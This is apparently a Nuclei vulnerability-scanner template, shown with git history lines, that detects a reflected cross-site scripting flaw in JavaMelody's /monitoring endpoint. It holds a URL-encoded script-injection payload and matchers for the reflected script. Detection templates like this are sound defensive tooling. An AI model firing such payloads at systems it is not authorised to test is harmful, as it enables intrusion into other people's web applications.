nuclei-templates/vulnerabilities/other/java-melody-xss.yaml

32 lines
779 B
YAML
Raw Normal View History

id: java-melody-xss
2022-01-21 17:19:43 +00:00
info:
name: JavaMelody Monitoring - Cross-Site Scripting
2022-01-21 17:19:43 +00:00
author: kailashbohara
severity: medium
description: Reflected cross site scripting (XSS) in JavaMelody monitoring.
reference:
- https://github.com/Hurdano/JavaMelody-XSS
- https://github.com/javamelody/javamelody/pull/555
2022-01-21 17:19:43 +00:00
tags: xss,javamelody
requests:
- method: GET
path:
- '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2022-01-21 17:19:43 +00:00
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
2022-01-21 17:19:43 +00:00
- type: word
part: header
2022-01-21 17:19:43 +00:00
words:
- text/html
2022-01-21 17:19:43 +00:00
- type: status
status:
- 200